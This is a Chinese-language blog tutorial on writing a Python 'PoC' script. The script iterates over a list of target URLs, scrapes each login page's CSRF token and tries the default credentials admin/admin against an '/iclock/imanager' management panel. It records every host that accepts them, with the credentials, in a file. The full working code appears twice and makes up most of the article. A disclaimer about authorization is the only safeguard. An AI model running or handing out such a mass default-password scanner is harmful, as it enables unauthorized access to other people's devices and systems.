寒假学习第24天---PythonPoc基础编写（二）-编程知识

提示：所分享内容仅用于每一个爱好者之间的技术讨论及教育目的，所有渗透及工具的使用都需获取授权，禁止用于违法途径，否则需自行承担，本作者不承担相应的后果。

文章目录

前言
- 一、目标
- 二、过程
- - 思路
  - 实践开始
- 总结
- 完整代码

前言

又来了哈，小六花祝你早日学习poc的编写，上一次的poc编写链接
链接

一、目标

我们可以编写poc的脚本来验证一些简单的操作，今天我们来模拟登陆，如果登陆成功就写入一个文档里，方便我们后续的操作

二、过程

思路

我们想对一个网站进行登陆操作，肯定要获取它的服务器返回了什么东西，我们f12先抓个包，看请求了什么
在这里插入图片描述
有这些东西，username,password,logintype,csrfmiddlewaretoken,其中
csrfmiddlewaretoken,这个字段，每个网站都不一样，我们对每个网站都需要重新进行获取
服务器返回信息，这个解码就是对不起，你的用户名或密码错误，如果登陆成功 ret的字段会变成0，这样就简单了，我们直接让csrfmiddlewaretoken自动向网站获取，ret=0并且状态码为200（这里需要用json的编码）
在这里插入图片描述

实践开始

引用库

import requests
from bs4 import BeautifulSoup
from tqdm import tqdm

requests：一个简单易用的HTTP库，用于发送HTTP请求。
BeautifulSoup：一个用于解析HTML和XML文档的库，可以从网页中提取数据。
tqdm：一个快速、可扩展的Python进度条库，可以在Python长循环中添加一个进度提示信息。

# 初始化会话
session = requests.Session()file_path = 'url.txt'
success_file_path = 'success_urls.txt'  # 成功登录信息将被记录到这个文件urls = []  # 存储所有URL
with open(file_path, 'r') as file:for line in file:urls.append(line.strip())

将session初始化，创建一个Session实例。Session对象允许你跨请求保持某些参数，比如cookies，即在同一个Session实例发出的所有请求之间保持cookies。
定义urls列表，将文件写入列表中，方便计数，展示进度
line.strip()去除前后文空格以及换行符

for url in tqdm(urls, desc="处理进度"):if not url.startswith("http"):url = "http://" + urllogin_url = url + "/accounts/login/?next=/iclock/imanager"  # 构造登录页面URL

desc="处理进度"设置了进度条的描述文字。

# 尝试获取登录页面以及CSRF tokentry:response = session.get(login_url, verify=False)soup = BeautifulSoup(response.text, 'html.parser')csrf_token = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']except Exception as e:print(f'无法从{login_url}获取CSRF token: {e}')continue

获取csrfmiddlewaretoken的值

  # 准备请求头和数据headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36",}data = {"username": "admin","password": "admin","logintype": "user","csrfmiddlewaretoken": csrf_token  # 使用动态获取的CSRF token}

请求头的构造

   # 尝试登录try:response = session.post(login_url, headers=headers, data=data, verify=False)if response.status_code == 200:if response.text:try:response_data = response.json()if response_data.get('ret') == 0:print(f'URL: {url} - 登录成功: {response_data.get("message")}')with open(success_file_path, 'a') as success_file:success_file.write(f'URL: {url}\n账号: {data["username"]}\n密码: {data["password"]}\n\n')else:print(f'URL: {url} - 登录失败: {response_data.get("message")}')except ValueError as e:print(f'URL: {url} - 解析JSON失败: {e}')else:print(f'URL: {url} - 响应非JSON格式或为空')else:print(f'URL: {url} - 请求未成功，HTTP状态码: {response.status_code}')except Exception as e:print(f'URL: {url} - 请求失败: {e}')

使用POST方法，发送登录请求到登录页面。先检测网站是否能打开，再获取内容
根据响应状态码和响应内容判断登录是否成功。如果返回的是JSON格式且ret字段为0，则认为登录成功，并将成功的URL、用户名和密码写入success_urls.txt文件。
在这里插入图片描述
成功的话就写入success_urls.txt

在这里插入图片描述

总结

主要用于自动化测试网站的登录功能，特别是在有多个URL需要测试时，可以大大节省时间，不知不觉已经24天了，希望大家关注一下我，嘿嘿，六花祝你新年快乐

完整代码

import requests
from bs4 import BeautifulSoup
from tqdm import tqdm  # 导入tqdm# 初始化会话
session = requests.Session()file_path = 'url.txt'
success_file_path = 'success_urls.txt'  # 成功登录信息将被记录到这个文件urls = []  # 存储所有URL
with open(file_path, 'r') as file:for line in file:urls.append(line.strip())# 使用tqdm创建进度条
for url in tqdm(urls, desc="处理进度"):if not url.startswith("http"):url = "http://" + urllogin_url = url + "/accounts/login/?next=/iclock/imanager"  # 构造登录页面URL# 尝试获取登录页面以及CSRF tokentry:response = session.get(login_url, verify=False)soup = BeautifulSoup(response.text, 'html.parser')csrf_token = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']except Exception as e:print(f'无法从{login_url}获取CSRF token: {e}')continue# 准备请求头和数据headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36",}data = {"username": "admin","password": "admin","logintype": "user","csrfmiddlewaretoken": csrf_token  # 使用动态获取的CSRF token}# 尝试登录try:response = session.post(login_url, headers=headers, data=data, verify=False)if response.status_code == 200:if response.text:try:response_data = response.json()if response_data.get('ret') == 0:print(f'URL: {url} - 登录成功: {response_data.get("message")}')with open(success_file_path, 'a') as success_file:success_file.write(f'URL: {url}\n账号: {data["username"]}\n密码: {data["password"]}\n\n')else:print(f'URL: {url} - 登录失败: {response_data.get("message")}')except ValueError as e:print(f'URL: {url} - 解析JSON失败: {e}')else:print(f'URL: {url} - 响应非JSON格式或为空')else:print(f'URL: {url} - 请求未成功，HTTP状态码: {response.status_code}')except Exception as e:print(f'URL: {url} - 请求失败: {e}')